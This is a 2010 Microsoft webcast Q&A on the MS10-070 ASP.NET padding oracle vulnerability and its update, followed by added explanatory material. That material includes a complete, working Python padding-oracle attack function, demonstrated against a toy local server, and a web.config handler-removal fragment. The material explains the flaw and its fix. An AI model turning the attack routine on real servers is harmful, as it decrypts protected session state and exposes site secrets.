Monthly Security Bulletin Webcast Q&A - September 2010 (Out-of-Band)
Hosts: Dave Forstrom, Director, Trustworthy Computing
Dustin Childs, Senior Security Manager
Chat Topic: September 2010 Out-of-Band Security Bulletin Release
Date: Tuesday, September 28, 2010
Q: The Security Response and Defense Blog (SRD) on Sept 20th has DetectCustomErrorsDisabled.vbs ver 3.1 (2010-09-20), and ScottGu's Sept. 18th blog links to script ver 3.0; which is most current and should be used to scan?
A: At this point we recommend moving to installing the MS10-070 update. The VBScript was only relevant for the posted workaround - which is now superseded by the update.
Q: If I apply MS10-070, is this the SAME as doing the workaround (customErrors mode="On") etc ?
A: The bulletin updates supersede the workarounds. The update itself does not implement the workaround. The update addressed the vulnerability by signing all data that is encrypted by ASP.NET.
Q: Will there be a specific update for Microsoft SharePoint? There were different procedures from the Security Advisory for that from the SharePoint developers.
A: SharePoint uses the same public redistributables of the .NET Framework that other customers use, so the updates for the .NET Framework released today will help secure SharePoint customers too. There are no separate updates for SharePoint customers.
Q: Are you familiar with the "Padding Oracle Vulnerability Test" site at http://paddingoracletest.com/ and do you recommend using it?
A: We are aware that this site exists but have no further information about it; and, therefore cannot recommend using it.
Q: Do the updates change the ASP.NET version displayed by IIS Manager Web Service Extensions so we can check here if update applied (faster than Microsoft Baseline Security Analyzer (MBSA) scan)?
A: No, the publicly displayed version shown will not provide that information.
Q: Can you back out the Padding Oracle Exploit tool (POET) security update after it is applied?
A: Yes. All updates for the .NET Framework may be uninstalled by using the uninstall option for the update in Add/Remove programs. You may also uninstall the update from the command line <update.exe> /uninstall.
Q: Please discuss the relationship between Secure Socket Layer (SSL) and "Padding Oracle". Do I not have the vulnerability if I have no sites with SSL certificates?
A: The vulnerability is unrelated to SSL. It involves ASP.NET specific usage of encryption - in short any ASP.NET site is affected and should be updated - regardless of whether SSL is being used or not.
Q: Does this vulnerability expose a risk to the Encryption Key? Or does it bypass the need to find the key? If they still have to brute force the key, what is the complexity for the attacker to solve it? Is it a matter of minutes?
A: The vulnerability can be leveraged to get ScriptResource.axd to download web.config - which for many websites contains both the encryption and signing keys for the website.
Q: The base Common Vulnerability Scoring System (CVSS) score is rated a 5 for this vulnerability, why the out-of-band (OOB) release?
A: Microsoft has released out of band for updates rated Moderate, Important and Critical. In this case, an attacker could retrieve files with no user interaction, potentially retrieving private certificates, encryption keys, credentials to other systems, and other sensitive information. In addition, the attacker could tamper with data to cause the server to take unexpected actions. These actions can lead to code execution if certain common web applications are installed. Because the full impact of this vulnerability depends on the web applications installed and the configuration of the server, the vulnerability rating is only a starting point to assessing the impact to any individual system.
Q: What is the risk and attack vector to non-web based servers and workstations with asp.net installed?
A: Machines that have ASP.NET bits installed, but are not running any websites, are not vulnerable. However if those machines subsequently start running active websites, then they will be vulnerable.
Q: Will this threat impact Internet Security & Acceleration Server (ISA) firewalled forms based SharePoint implementations? If so how?
A: The threat affects any use of encrypted state information sent and processed by ASP.NET. Since SharePoint sits on top of ASP.NET, it is affected. Forms authentication cookies are not the primary attack vector and hence any firewall proxying of forms authentication cookies has no effect on stopping the threat.
Q: If ASP.NET is still sending a code back, but it is now a 404 error with custom errors on, is the aspxerrorpath= in the query string just a bug? And if it is, will it be fixed, as it could cause more security problems in the future?
A: It is an old behavior of customErrors. We may change the logic in the future to no longer key off of aspxerrorpath when attempting to detect errors being thrown from within the customErrors processing.
Q: Does the MS10-070 security update work with Microsoft Office SharePoint Server 2007 with form-based authentication?
A: Yes, it does.
Q: For Windows Server 2008 R2 do we need to use the Server 2008 SP2 updates?
A: As part of the bulletin MS10-070 we have released individual updates for Windows Vista/Windows Server SP2 and Windows7/Windows Server 2008 R2. You should install the update corresponding to Windows Server 2008 R2 i.e. KB2416471.
Q: When we installed asp.net 4.0, a folder called "aspnet_client" gets created on all the website applications in IIS 7.0. Will an "aspnet_client" folder be created on websites I have in IIS 7.0 if this update is installed?
A: As a side effect of the update installation process aspnet_regiis will run - so yes the folder will get created. However the 4.0 folder will be empty.
Q: In some recent .Net updates we have seen what was expressed as a corruption in meta data that would not allow installing the newest update until the previous update for that version of .Net was removed. Have you seen any of this in your testing or received
A: Microsoft extensively tests all security updates before shipping these broadly to customers but due to the very diverse ecosystem of hardware and software customers use there may be a small number of customers who encounter issues either during or after installing an update. If you see an issue with these updates you can call 1-866-PCSAFETY (1-866-727-2338) for free technical support.
Q: Juliano Rizzo and ThaiDuong refer to a 'Golden Rule of Web Security' in their EkoParty presentation:
Do not keep anything sensitive (Web.Config!) inside the document root.
How do you respond to that statement? What can we do in general to apply to this 'Golden Rule'?
A: Web.config information can be secured in 2.0 (and later) by using protected configuration (http://msdn.microsoft.com/en-us/library/53tyfkaw.aspx). Protected configuration will convert sensitive configuration sections like machineKey into encrypted text. The key information used for the encryption operation is separate and apart from the keys used by the web application.
Q: Is it recommended to change the machineKey after applying the update?
A: Yes - we recommend rolling the keys.
Q: Will existing forms authenticated cookies stop working after this update? That is, will this log out current users?
A: At this time the updates are only available on the Microsoft Download Center, customers will need to download and deploy the updates to machines that need the corresponding updates. We will make these updates available via WU and WSUS beginning in a couple days and at that time the detection logic will ensure that these update are only installed to the applicable machines.
Q: I'm still confused about which versions I would need to install if I'm running Win 2003 32bit, and have installed ASP.net 1.1, then 2.0, then 3.0 and 3.5, then later 3.5 SP1 do I need updates for all of these 1.1, 2.0, 3.5, AND 3.5 SP1?
A: Since you installed 3.5 SP1, you need the 3.5 SP1 update. There are two updates for 3.5 SP1 - one update will update the 2.0 layer and the other will update the 3.5 layer. In addition to that you will need the 1.1 update since 1.1 is a different FX version from 3.5 SP1.
Q: I am not comfortable with the update sequence installation... For instance, on our SharePoint servers, we have the .NET platform installed from 1.1 through 3.5 SP1... Do I understand that we need to install these updates for every .NET platform installed?
A: That is correct, if you have more than 1 version of the .NET Framework installed then you need to install the updates corresponding to each version you have installed. We recommend you do this by starting from the lowest version and going up to the highest version.
Q: Are there any PowerShell scripts available for discovery of vulnerable systems (that have ASP.NET.)?
A: No, there aren't any PowerShell scripts available. The VBScript available on Scott Guthrie's blog can be modified to use PowerShell without a lot of effort.
A: Please see KB318785 for guidance on this determination.
Q: On x64 servers that host 64bit and 32bit web apps, do we apply both x86 and x64 updates or just x64 updates?
A: Only the x64 updates. The x64 updates contain updates to 32-bit binaries as well.
Q: Scott Guthrie's Blog entry states the same download for 2 different framework versions; can you confirm this is not a typo?
A: The same update can apply to more than one operating system. Also, some operating system and .NET Framework combinations require two updates to be installed. The table in Scott Guthrie's Blog is accurate.
Q: We are running Windows 2008 SP1 x64, should we use the Windows 2008 x64 installers?
A: Make sure to use the update that is applicable to your .NET version and platform. If you are running Windows Server 2008 SP1 x64, then you should install the Windows Server 2008 SP1 for x64-based Systems .NET framework packages.
Q: Installation of URL Scan was part of the workarounds. You are now saying to roll back the workarounds. Should we leave URL Scan?
A: You should roll back the aspxerrorpath specific workaround in UrlScan. You may leave UrlScan still installed and running because it provides additional security benefit to your web server. However, some applications like SharePoint have compatibility issues with UrlScan, so you should test to make sure that UrlScan does not have any unexpected impact in your environment.
Q: Is it correct that Unified Access Gateway (UAG) Servers needs to be updated also?
A: Internet Security & Acceleration Server (ISA) / Unified Access Gateway (UAG) servers do not typically host web servers with ASP.NET on them and as such are not at immediate risk. If these servers have the .NET Framework installed, the updates will be installable to update your system though.
Q: With any of these out-of-band (OOB) updates, is there the risk of the behavior described in KB 2307350 and KB 2321027 being encountered?
A: The behavior described in KB2307350 is default behavior for all .NET Framework updates, so the behavior will occur.
Q: So to get the update from the download center for testing, do we need to download each individual update separately?
A: Yes. To update your system, you will need to download the update that applies to your environment and manually install it.
Q: SharePoint specific - re: http://weblogs.asp.net/scottgu/archive/2010/09/24/update-on-asp-net-vulnerability.aspx -- should the entry be 'errortext=' instead?
A: No. After editing UrlScan.ini that section of the ini file looks like:
; If any character sequences listed here appear in the query
; string for any request, that request will be rejected.
Q: Will there be a specific update for SharePoint? There were different procedures in the Security Advisory for that from the SharePoint developers.
A: SharePoint uses the same public redistributables of the .NET Framework that other customers use, so the update for the .NET Framework released today will help secure SharePoint customers, too. There is not a separate update for SharePoint customers.
Q: Can the update affect internal encryption use with specific asp.net features? For example, the membership provider with password recovery on?
A: Membership password encryption behavior is not modified by any of the updates. Only transient state is affected by this update: cookie encryption, query-string values, and viewstate.
Q: Does the update change the ASP.NET version displayed by IIS Manager Web Service Extensions so we can check here if update applied (faster than MBSA scan)?
A: No - the version shown is only to the third digit; which does not revise due to the update.
Q: Is there a difference in protection between the published workarounds (including URLScan) and the update?
A: The released update supersedes the workaround. All workarounds can be backed out once the update is installed.
Q: I have been trying to sync up this out-of-band (OOB) with my Windows Server Update Services (WSUS) 3.0 console. Is this bulletin not supported by WSUS 3.0?
A: This update is only available to the download center today, but it will be available to Windows Server Update Services (WSUS) 3.0 later this week when we release it to all of our automatic update tool sets.
Q: If the update for .NET 2.0 service pack 2 is installed on .net 2.0 service pack 1, will this break .NET? Will this secure the system?
A: The update corresponding to .NET Framework 2.0 SP2 should only be installed on machines with that particular version present; you should not install updates where you do not have the corresponding product installed. Doing so may leave the computer in an inconsistent or unpredictable state.
Q: Can you clarify the functionality changed in IIS? I need to understand what portions of my applications need to be retested after I install this update. Knowing what changed in IIS will assist me in that analysis.
A: There was no change in IIS functionality. The update is targeted to ASP.NET specifically. The main change is that portions of the web application that previously used encryption now use signing in addition to encryption. This applies to viewstate and forms authentication cookie encryption among others.
Q: If I have .NET 3.5.1 and 4.0 on the same system would I need both updates?
A: Yes, you must apply both updates.
Q: Is the update cumulative, or do I (for example) have to install updates for 1.1 SP1, 2.0 SP2, 3.5, *AND* 3.5 SP1? in order?
A: Yes. If you have multiple versions of the .NET Framework installed then you should install the update corresponding to all versions.
Q: Would an Exchange Front End server running IIS and publishing OWA through ISA server be affected from the outside?
A: Yes, you would be affected. If you implemented specific filters in your firewall to track 500 error responses, you could use this to deter a malicious client, but this would not be considered a workaround. You should be applying the security update in this environment.
Q: How does this impact Web services using Web Services Enhancements (WSE 3.0)?
A: Although web service code itself is not attackable, since web services are hosted in ASP.NET, unless steps were taken to strip down the module and handler list of the web service application to only include asmx/svc handlers - the application is still vulnerable.
Q: Are the downloads smart enough to know if they are needed to install? That is, if it's not needed on the PC will it flag and not install on that pc?
A: At this time the update is only available via the Download Center so customers would need to download and deploy the update to the appropriate machines. When this update is available via Windows Update (WU) and WSUS in the future the detection logic will ensure the update is only installed on the machines that need them.
Q: Will existing forms authentication cookies stop working after this update? That is, will this log out current users?
A: Yes. The update needs to be installed across all servers in a cluster. After the update is installed, the forms authentication cookie will be in a somewhat different format - and thus older cookies will no longer work. Users logged in with "remember me" functionality will need to log in again.
Q: Is there an extra workaround that can be applied to Threat Management Gateway (TMG) / ISA Server filtering?
A: ISA and other firewall filters cannot be used to work-around this issue. At best they can be used as a deterrent to slow a malicious client.
Q: Should these updates be applied on all internal network servers even though they are not exposed in the demilitarized zone (DMZ)?
A: You should prioritize installation on servers exposed to the demilitarized zone (DMZ). There is still an insider threat that would need to be addressed with this vulnerability, and intranet servers should be updated to address this.
Q: How are SQL Reporting Services affected, which runs on IIS and ASP.NET 1.1, but is generally a fragile installation?
A: We recommend installing the 1.1 update because SSRS running on ASP.NET 1.1 still has the base ASP.NET product installed and running.
Q: Can you please elaborate on how the encryption padding is used during the exploit? Are the error codes described actually used as encryption padding?
A: The attacker repeatedly guesses at initialization vector values to try to produce valid padding, using the different error codes to tell when a guess is accurate. A different error code is returned when the padding is correct than when it isn't, allowing the attacker to tell when a guess is correct. By repeatedly using this technique, the attacker can determine the initialization vector and eventually reverse the encryption.
Q: Will this have an impact on the web applications themselves (homegrown or otherwise)?
A: If an attacker downloads the application's web.config, then depending on what the application itself allows in terms of remote editing it could be possible to further compromise the application.
Q: Does this vulnerability create any opportunities for an attacker to exploit remote code execution or escalation of privilege?
A: Potentially yes - it depends on whether or not the web application has additional functionality like administration modules which themselves allow tasks like administrative-upload of code.
Q: SBS 2003 by default runs WSS 2.0 and ASP.NET 1.1. The Microsoft SharePoint Team Blog on this advisory says that sites running ASP.NET 1.1 are not affected. Does this mean that Windows Small Business Server (SBS 2003) servers that have not had WSS upgraded or the web sites (or directories) switched from ASP.NET 1.1 (or do not have other vulnerable applications installed) are not vulnerable, do not need the workaround, and do not need the update to be released on September 28, 2010?
A: If there are any active ASP.NET 1.1 sites, the update should be installed. Also the SharePoint team updated their blog post recently to include SharePoint 3.0 as being affected - so yes the update still needs to be installed.
Q: I am supporting a customer who wants to know how extensive the OOB update is that makes it unnecessary to implement the work-around referenced last week. What guidance do we give for how to test the out-of-band (OOB) release?
A: The OOB update makes fundamental changes to ASP.NET encryption to include signing and verification of all encrypted data. That change shuts down all padding oracle attack vectors.
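The mechanics described in the two answers above (guessing byte values and using the server's distinguishable padding error as a yes/no oracle, then removing the oracle by signing every encrypted blob and verifying the signature before decryption) can be seen end to end in the following added example. It is illustrative code written for this page, not Microsoft's code or the real ASP.NET implementation: the Server class is a hypothetical model of unsigned versus signed encrypted state, the block cipher is a stand-in Feistel construction chosen so the script runs on the Python standard library alone, and the plaintext is a constructed sample.

```python
import hashlib, hmac, os

BLOCK = 16

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

# Stand-in 16-byte block cipher (4-round Feistel over HMAC-SHA256): not AES, but the
# attack only needs CBC mode plus an unauthenticated padding check, not a particular cipher.
def _f(key, half, rnd):
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:8]

def _feistel(key, blk, rounds):  # encrypt with range(4), decrypt with reversed(range(4))
    l, r = blk[:8], blk[8:]
    for i in rounds:
        l, r = r, _xor(l, _f(key, r, i))
    return r + l

def unpad(data):  # PKCS#7; the ValueError is the signal the oracle leaks
    n = data[-1]
    if n < 1 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key, iv, pt):
    n = BLOCK - len(pt) % BLOCK
    pt += bytes([n]) * n
    out, prev = b"", iv
    for i in range(0, len(pt), BLOCK):
        prev = _feistel(key, _xor(pt[i:i + BLOCK], prev), range(4))
        out += prev
    return out

def cbc_decrypt(key, iv, ct):
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += _xor(_feistel(key, ct[i:i + BLOCK], reversed(range(4))), prev)
        prev = ct[i:i + BLOCK]
    return unpad(out)

class Server:  # hypothetical model of ASP.NET encrypted state: blob = IV || CBC ciphertext
    def __init__(self):
        self.enc_key, self.mac_key = os.urandom(32), os.urandom(32)
    def protect(self, plaintext):
        iv = os.urandom(BLOCK)
        return iv + cbc_encrypt(self.enc_key, iv, plaintext)
    def padding_oracle(self, blob):
        # Pre-update: a padding failure is distinguishable from every other outcome
        # (for ASP.NET, an HTTP 500 where any other input draws a different response).
        try:
            cbc_decrypt(self.enc_key, blob[:BLOCK], blob[BLOCK:])
            return True
        except ValueError:
            return False
    def protect_signed(self, plaintext):
        blob = self.protect(plaintext)
        return blob + hmac.new(self.mac_key, blob, hashlib.sha256).digest()
    def signed_oracle(self, blob):
        # Post-update: verify the tag (constant time) before decrypting; a modified blob never reaches the padding check.
        body, tag = blob[:-32], blob[-32:]
        expected = hmac.new(self.mac_key, body, hashlib.sha256).digest()
        return hmac.compare_digest(tag, expected) and self.padding_oracle(body)

def padding_oracle_attack(oracle, blob):
    blocks = [blob[i:i + BLOCK] for i in range(0, len(blob), BLOCK)]
    recovered = b""
    for n in range(1, len(blocks)):
        target, prev = blocks[n], blocks[n - 1]
        inter = bytearray(BLOCK)  # D_key(target), learned one byte at a time
        for pos in range(BLOCK - 1, -1, -1):
            padv = BLOCK - pos  # padding value the forged IV must make the server see
            forged = bytearray(inter[j] ^ padv if j > pos else 0 for j in range(BLOCK))
            for guess in range(256):
                forged[pos] = guess
                if not oracle(bytes(forged) + target):
                    continue
                # Last byte only: disturb the byte before it so a lucky 0x02 0x02 (etc.) is not taken for 0x01.
                if pos == BLOCK - 1 and not oracle(bytes(forged[:-2]) + bytes([forged[-2] ^ 0xFF, guess]) + target):
                    continue
                inter[pos] = guess ^ padv
                break
            else:
                raise RuntimeError("no guess accepted: there is no padding oracle here")
        recovered += _xor(inter, prev)
    return unpad(recovered)

def demo_unsigned():
    srv = Server()
    return padding_oracle_attack(srv.padding_oracle, srv.protect(b"user=alice;role=user"))

def demo_signed():
    srv = Server()
    blob = srv.protect_signed(b"user=alice;role=user")
    tag = blob[-32:]  # the attacker can only replay the tag it observed
    try:
        padding_oracle_attack(lambda body: srv.signed_oracle(body + tag), blob[:-32])
    except RuntimeError:
        return "blocked: MAC verified before decryption"
    return "attack succeeded"
```

demo_unsigned() recovers the full plaintext with at most 256 oracle queries per byte and never touches the key, which is why "no SSL" or "firewall filtering" does not help: the server itself is the oracle. demo_signed() shows the post-update shape of the fix: because the tag is checked before any decryption, every modified blob is rejected on the same path and the attacker gets no padding signal at all. The attack is the general CBC padding-oracle procedure rather than anything specific to ScriptResource.axd; the file-download consequence on the page comes from what the decrypted (and re-encryptable) state is then used for.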
Q: The recommended workaround is to use the web.config custom errors setting to redirect to a generic error page. Will using the error handler in the Global.asax to redirect all errors to a generic error page also be an acceptable workaround?
A: At this point customers should move as quickly as possible to install the update - at which point all workarounds can be backed out.
Q: What are Microsoft's recommendations for deployment of this update to large developer environments to commence testing prior to the update being made available via the normal distribution channels?
A: Microsoft extensively tests all security updates before releasing them, but we always recommend customers test these environments with their applications in the environment. Due to the nature of the vulnerability we do not recommend waiting for the availability on WU/WSUS, we recommend you install the updates as soon as possible.
Q: Please list all Microsoft products that use ASP.NET in MS10-070, Exchange OWA and SharePoint are mentioned, but CRM hotfix 2416728 is not listed.
A: MS10-070 addresses the underlying vulnerability in ASP.net. Products utilizing ASP.net will be protected after this update is installed and do not require additional customer action.
Q: Windows Home Server wasn't listed in the MS10-070 bulletin; hoping to hear a comment about which Server 2003 update to use.
A: Windows Home Server is based on the Windows Server 2003 codebase but ships with the .NET Framework 3.5 SP1 so you should refer to the updates for .NET Framework 3.5 SP1 in order to help secure the system.
Q: Is there an article that lists the DLLs that were updated for this hotfix?
A: The KB articles corresponding to each update list the files being replaced by the particular update.
Q: Are there specific areas we should focus post update application testing on?
A: The update makes changes to the encrypted formats of forms authentication cookies, role manager cookies, viewstate, and Urls generated for use by webresource.axd/scriptresource.axd. If your application uses any of those features, those features would be good choices to focus testing on.
Q: My understanding is that the ability to access files such as web.config limited to .Net 3.5.1 sites and later. Is there a means to determine if this has already been exploited?
A: No there isn't. If there is a concern we recommend changing the encryption and validation keys in web.config.
Q: If our web infrastructure is behind an ISA 2006 server and the ISA server is publishing our web infrastructure, will ISA provide any protection from this vulnerability?
Q: Can we now continue to use the standard "An error occurred while processing your request." error?
A: You can back out any changes to customErrors that were made previously and return back to your previous configuration/code that you used for handling errors.
Q: Can we undo the changes done on the servers per the published workarounds after the update is installed?
A: Yes. You can back out any changes to customErrors that were made previously and return back to your previous configuration/code that you used for handling errors.
Q: Is information from the cookies also vulnerable?
A: Potentially yes. The padding oracle attack is a class of attack made on encrypted state - since some ASP.NET cookies are encrypted they are vulnerable to the attack.
Q: What are Microsoft's recommendations for deployment of this update to large dev environments to commence testing prior to the update being made available via the normal distribution channels?
A: Web servers with ASP.NET enabled are at the highest risk from this vulnerability. Systems that are not running Web services with ASP.NET enabled are not vulnerable, however vulnerable files exist in the systems listed in the Affected Software section in this bulletin.
A: If machines only have ASP.NET bits on them, but do not actively serve ASP.NET pages/websites, and are not used for developing ASP.NET code, then there is no urgency to apply the patch.
Q: Is there a way to disable the file exfiltration feature in ASP.NET?
A: If an application does not make use of ASP.NET AJAX features, the ScriptResource.axd handler can be removed from the handler list. For classic mode the handler can be removed from the system.web/httpHandlers section. For IIS7/7.5 integrated mode the handler can be removed from the system.webServer/handlers list. Note though that most ASP.NET AJAX applications typically end up using ScriptResource.axd on one or more pages in an application. Before removing the handler you should test your ASP.NET application to ensure that it doesn't break when the ScriptResource handler is removed.
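The two removal locations named in the answer above, as an added web.config fragment written for this page (not taken from the bulletin or from a Microsoft sample). The commented-out registration shows the shape of the entry a Visual Studio 2008 project normally carries so the removal can be matched against it; the handler names in the integrated-mode section ("ScriptResource" for the 3.5-era app-level entry, "ScriptResourceIntegrated-4.0" for the 4.0 root web.config entry) are stated from memory and should be verified against the effective configuration on the server before relying on them.

```xml
<configuration>
  <!-- Classic pipeline (IIS 6, or IIS 7/7.5 application pools in classic mode):
       ASP.NET handlers live under system.web/httpHandlers. -->
  <system.web>
    <httpHandlers>
      <!-- Typical registration generated for a .NET 3.5 AJAX application:
      <add verb="GET,HEAD" path="ScriptResource.axd"
           type="System.Web.Handlers.ScriptResourceHandler, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"
           validate="false" />
      -->
      <!-- Removal: match on the same verb and path as the registration. -->
      <remove verb="GET,HEAD" path="ScriptResource.axd" />
    </httpHandlers>
  </system.web>

  <!-- Integrated pipeline (IIS 7/7.5): handlers live under system.webServer/handlers
       and are removed by name. Check the inherited name first, e.g.
       %windir%\system32\inetsrv\appcmd list config "Default Web Site/MyApp" /section:system.webServer/handlers
       (MyApp is a placeholder for your application path). -->
  <system.webServer>
    <handlers>
      <remove name="ScriptResource" />                <!-- 3.5 app-level registration (assumed name) -->
      <remove name="ScriptResourceIntegrated-4.0" />  <!-- 4.0 root-level registration (assumed name) -->
    </handlers>
  </system.webServer>
</configuration>
```

Only include the removal that matches a registration actually present for the application; removing a name that is not registered in a parent configuration causes a configuration error for that site. As the answer says, this is a last resort for applications that do not use ASP.NET AJAX at all, and the update itself remains the fix.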